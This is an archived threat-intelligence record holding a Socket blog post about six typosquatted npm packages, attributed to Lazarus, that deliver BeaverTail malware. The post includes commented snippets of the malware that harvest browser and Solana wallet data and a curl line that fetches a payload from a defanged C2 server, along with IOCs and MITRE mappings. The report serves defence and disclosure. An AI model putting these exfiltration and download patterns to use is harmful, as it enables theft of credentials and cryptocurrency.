{ "id": "157871f6-9927-4682-a7e0-eea3c7892667", "created_at": "2026-04-06T03:37:01.970276Z", "updated_at": "2026-04-10T03:38:20.416647Z", "deleted_at": null, "sha1_hash": "5a761631ccb4e063d1ef272238faf829f3d67180", "title": "Lazarus Strikes npm Again with New Wave of Malicious Package...", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 859969, "plain_text": "Lazarus Strikes npm Again with New Wave of Malicious Package...\r\nArchived: 2026-04-06 03:23:08 UTC\r\nSecure your dependencies with us\r\nSocket proactively blocks malicious open source packages in your code.\r\nInstall\r\nNorth Korea’s Lazarus Group continues to infiltrate the npm ecosystem, deploying six new malicious packages\r\ndesigned to compromise developer environments, steal credentials, extract cryptocurrency data, and deploy a\r\nbackdoor. In this campaign, Socket researchers uncovered BeaverTail malware embedded within seemingly\r\nbenign packages — is-buffer-validator , yoojae-validator , event-handle-package , array-empty-validator , react-event-dependency , and auth-validator — each closely mirroring tactics previously\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 1 of 9\n\ndocumented in Lazarus (Contagious Interview) operations. These findings align with the Socket Threat Research\r\nTeam’s January 2025 report on the Lazarus APT group’s ongoing supply chain compromises.\r\nThe six new packages — collectively downloaded over 330 times — closely mimic the names of widely trusted\r\nlibraries, employing a well-known typosquatting tactic used by Lazarus-linked threat actors to deceive developers.\r\nAdditionally, the APT group created and maintained GitHub repositories for five of the malicious packages,\r\nlending an appearance of open source legitimacy and increasing the likelihood of the harmful code being\r\nintegrated into developer workflows.\r\nAs of this writing, the packages remain live on the npm registry. We have petitioned their removal and reported\r\nthe associated GitHub repositories and user accounts.\r\nLazarus: Can’t Stop, Won’t Stop With Malicious Packages#\r\nAttributing this attack definitively to Lazarus or a sophisticated copycat remains challenging, as absolute\r\nattribution is inherently difficult. However, the tactics, techniques, and procedures (TTPs) observed in this npm\r\nattack closely align with Lazarus’s known operations, extensively documented by researchers from Unit42,\r\neSentire, DataDog, Phylum, and others since 2022.\r\nThis campaign exhibits numerous hallmarks of Lazarus’ methodology in deploying malicious packages, including:\r\nThe use of identical obfuscation techniques and tooling observed in previous Lazarus campaigns\r\nCross-platform targeting of Windows, macOS, and Linux systems\r\nDeployment of BeaverTail malware along with the second-stage InvisibleFerret backdoor\r\nScript functionality, structure, and malicious intent closely resembling past Lazarus operations\r\nA command and control (C2) mechanism that follows the same pattern, utilizing newly acquired endpoints\r\nspecific to this campaign\r\nData theft tactics consistent with Lazarus’s previous supply chain compromises\r\nPersistence mechanisms aligned with prior Lazarus activity, further reinforcing the likelihood of their\r\ninvolvement\r\nThe following is a detailed breakdown of the malicious packages, including their associated npm aliases, email\r\naddresses, download counts, and linked GitHub repositories and accounts.\r\n1. is-buffer-validator : Published under the npm alias “edan0831” (email: edanjohn1991@gmail.com),\r\nthis package has been downloaded 52 times. Its source code is hosted on GitHub at\r\ngithub.com/edan0831/is-buffer-validator, under the edan0831 GitHub account.\r\n2. yoojae-validator : Published under the npm alias “hottblaze” (email: hottblaze012@gmail.com), this\r\npackage has 55 downloads. The corresponding GitHub repository is github.com/alximmykola379/yoojae-validator, associated with the alximmykola379 GitHub account.\r\n3. event-handle-package : Published under the npm alias “ricardoalexis07” (email:\r\nricardoalexis0629@gmail.com), this package has been downloaded 54 times. Unlike the others, it has no\r\npublicly linked GitHub repository.\r\n4. array-empty-validator : Published under the npm alias “alextucker0519” (email:\r\nalextucker@softworldnet.com), this package has 59 downloads. The corresponding GitHub repository is\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 2 of 9\n\ngithub.com/alextucker0519/array-empty-validator, under the alextucker0519 GitHub account.\r\n5. react-event-dependency : Published under the npm alias “elondavid” (email: elondavid888@gmail.com),\r\nthis package has 57 downloads. Its GitHub repository is available at github.com/elondavid888/react-event-dependency, linked to the elondavid888 account.\r\n6. auth-validator : Published under the npm alias “kevin_tr” (email: robustplutus@gmail.com), this\r\npackage has 54 downloads. While its original GitHub repository (github.com/kevin-tra/auth-validator) has\r\nsince been removed, historical records tie it to the kevin-tra GitHub account.\r\nSocket AI Scanner’s identified all six packages as malicious.\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 3 of 9\n\nAcross these packages, Lazarus uses names that closely mimic legitimate and widely trusted libraries, a hallmark\r\nof typosquatting tactics. For example, is-buffer-validator closely resembles the widely used is-buffer\r\nmodule authored by Socket CEO Feross Aboukhadijeh. Notably, the Socket Threat Research Team had previously\r\ndocumented Lazarus’ malicious npm activities in its January 2025 report. This resemblance may suggest the threat\r\nactor’s awareness of Socket’s research or a strategic attempt to exploit the established trust and widespread\r\nadoption of a legitimate library through typosquatting. What a coincidence.\r\nThe legitimate is-buffer package, authored by Feross Aboukhadijeh and maintained for over a\r\ndecade, has 33 million weekly downloads and has been downloaded over 134 million times overall,\r\nhighlighting its widespread adoption.\r\nTechnical Analysis\r\nThe code embedded within the malicious npm packages demonstrates the obfuscation techniques observed in\r\nearlier Lazarus-linked campaigns. It employs self-invoking functions, dynamic function constructors, and array\r\nshifting to obscure its true functionality. Despite these layers of concealment, the malware’s objectives align with\r\npreviously documented Lazarus operations, which have consistently leveraged multi-stage payload delivery and\r\npersistence mechanisms to maintain long-term access to compromised systems.\r\nThe code is designed to collect system environment details, including the hostname, operating system, and system\r\ndirectories. It systematically iterates through browser profiles to locate and extract sensitive files such as Login\r\nData from Chrome, Brave, and Firefox, as well as keychain archives on macOS. Notably, the malware also\r\ntargets cryptocurrency wallets, specifically extracting id.json from Solana and exodus.wallet from Exodus.\r\nThe stolen data is then exfiltrated to a hardcoded C2 server at hxxp://172.86.84[.]38:1224/uploads , following\r\nLazarus’s well-documented strategy of harvesting and transmitting compromised information.\r\nBelow is a code snippet demonstrating the malicious process of extracting and exfiltrating sensitive data, with\r\ninline comments explaining key functions and objectives:\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 4 of 9\n\n// Enumerate user profiles and extract browser data\r\nasync function uploadFiles(basePath, prefix, includeSolana, timestamp) {\r\n // basePath: Root directory (e.g., Chrome/Brave user data)\r\n // prefix: Identifier for exfiltrated files\r\n // includeSolana: Flag to collect Solana wallet keys\r\n // timestamp: Tracks exfiltration timing\r\n if (!testPath(basePath)) return; // Skip if directory is inaccessible\r\n // Scan up to 200 browser profiles\r\n for (let i = 0; i \u003c 200; i++) {\r\n const profileDir = `${basePath}/${i === 0 ? 'Default' : 'Profile ' + i}/Local Extension Settings`;\r\n // Look for known extension data (e.g., MetaMask, Exodus)\r\n // Capture .log and .ldb files\r\n }\r\n if (includeSolana) {\r\n // Locate Solana's id.json private key file\r\n const solanaPath = `${homeDir}/.config/solana/id.json`;\r\n if (fs.existsSync(solanaPath)) {\r\n // Extract and exfiltrate Solana wallet data\r\n }\r\n }\r\n // Upload stolen data to the C2 server\r\n}\r\nBeyond the silent enumeration and data exfiltration detailed above, the script also downloads additional malicious\r\ncomponents — specifically identified as the InvisibleFerret backdoor — using both curl commands and the\r\nNode.js request module. The secondary payload (SHA256:\r\n6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0 ) is downloaded under the filenames\r\np.zi or p2.zip and extracted using tar -xf , following a multi-stage deployment strategy consistent with\r\nprevious Lazarus campaigns that distributed the BeaverTail malware. The following snippet illustrates one stage\r\nof this process:\r\n// Fetch additional malware if p.zi is missing or incomplete\r\nfunction runP() {\r\n const pFile = `${tmpDir}\\\\p.zi`;\r\n const p2File = `${tmpDir}\\\\p2.zip`;\r\n if (fs.existsSync(pFile)) {\r\n // Check file size; rename to .zip for extraction or retry download\r\n } else {\r\n // Download payload from C2 using curl\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 5 of 9\n\nex(`curl -Lo \"${pFile}\" \"hxxp://172.86.84[.]38:1224/pdown\"`, (error) =\u003e {\r\n if (!error) {\r\n // Set file size, rename to p2.zip, and extract\r\n }\r\n });\r\n }\r\n}\r\nThrough these stages, Lazarus consistently prioritizes persistence and stealth. The script’s objectives go beyond\r\ncredential theft, seeking to embed itself within development workflows and ensuring continued compromise, even\r\nif one stage is detected and removed. By creating or repurposing GitHub repositories for the malicious packages,\r\nthe threat actor further obscures its activities, making the operation appear as part of legitimate open source\r\ndevelopment.\r\nOutlook and Recommendations\r\nWe assess that Lazarus and other advanced adversaries will continue to refine their infiltration tactics. Obfuscation\r\ntechniques are likely to evolve, incorporating more sophisticated code-hiding methods and deeper integration into\r\nlegitimate development workflows. Threat actors may also broaden their targeting to additional packages and\r\necosystems to expand their reach among developers, making early detection and contextual dependency scanning\r\nmore critical than ever.\r\nTo mitigate these threats, organizations should implement a multi-layered approach to detection and defense.\r\nAutomated dependency auditing and code reviews can help identify anomalies in third-party packages,\r\nparticularly those with low download counts or from unverified sources. Continuous monitoring of unusual\r\ndependency changes can expose malicious updates, while blocking outbound connections to known C2 endpoints\r\nprevents data exfiltration. Sandboxing untrusted code in controlled environments and deploying endpoint\r\nprotection can detect suspicious file system or network activities. Additionally, educating development teams on\r\ncommon typosquatting tactics promotes vigilance and reinforces proper vetting before installing new packages.\r\nDespite extensive obfuscation techniques — including variable renaming, string encoding, and control flow\r\nflattening — Socket’s static and behavioral analysis effectively identified all six packages as malware. The Socket\r\nGitHub app enables real-time scanning of pull requests, alerting developers to suspicious or malicious\r\ndependencies before integration. Additionally, incorporating the Socket CLI into npm installation workflows helps\r\ndetect anomalies before they reach production, while the Socket browser extension proactively warns users of\r\npotential threats upon download or viewing. By embedding these security measures into existing development\r\nworkflows, organizations can significantly mitigate the risk of supply chain attacks.\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 6 of 9\n\nSocket AI Scanner’s analysis, including contextual details about the malicious is-buffer-validator\r\npackage.\r\nIndicators of Compromise (IOCs)#\r\nMalicious npm Packages\r\nis-buffer-validator\r\nyoojae-validator\r\nevent-handle-package\r\narray-empty-validator\r\nreact-event-dependency\r\nauth-validator\r\nThreat Actor Identifiers\r\nnpm Aliases and Email Addresses:\r\nedan0831 — edanjohn1991@gmail.com\r\nhottblaze — hottblaze012@gmail.com\r\nricardoalexis07 — ricardoalexis0629@gmail.com\r\nalextucker0519 — alextucker@softworldnet.com\r\nelondavid — elondavid888@gmail.com\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 7 of 9\n\nkevin_tr — robustplutus@gmail.com\r\nGitHub Accounts:\r\nedan0831\r\nalximmykola379\r\nalextucker0519\r\nelondavid888\r\nkevin-tra\r\nMalicious GitHub Repositories\r\ngithub.com/edan0831/is-buffer-validator\r\ngithub.com/alximmykola379/yoojae-validator\r\ngithub.com/alextucker0519/array-empty-validator\r\ngithub.com/elondavid888/react-event-dependency\r\ngithub.com/kevin-tra/auth-validator (defunct)\r\nCommand and Control (C2) Endpoints\r\nPrimary C2 Server: 172.86.84[.]38\r\nAssociated Endpoints:\r\nhxxp://172.86.84[.]38:1224/uploads\r\nhxxp://172.86.84[.]38:1224/pdown\r\nhxxp://172.86.84[.]38:1224/client/9/902\r\nSHA256 Hash\r\n6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0\r\nMITRE ATT\u0026CK Techniques#\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1608.001 — Stage Capabilities: Upload Malware\r\nT1204.002 — User Execution: Malicious File\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1027.013 — Obfuscated Files or Information: Encrypted/Encoded File\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1005 — Data from Local System\r\nT1082 — System Information Discovery\r\nT1083 — File and Directory Discovery\r\nT1217 — Browser Information Discovery\r\nT1555.003 — Credentials from Password Stores: Credentials from Web Browsers\r\nT1555.001 — Credentials from Password Stores: Keychain\r\nT1041 — Exfiltration Over C2 Channel\r\nT1105 — Ingress Tool Transfer\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 8 of 9\n\nT1119 — Automated Collection\r\nT1657 — Financial Theft\r\nSource: https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages" ], "report_names": [ "lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775446621, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5a761631ccb4e063d1ef272238faf829f3d67180.pdf", "text": "https://archive.orkl.eu/5a761631ccb4e063d1ef272238faf829f3d67180.txt", "img": "https://archive.orkl.eu/5a761631ccb4e063d1ef272238faf829f3d67180.jpg" } }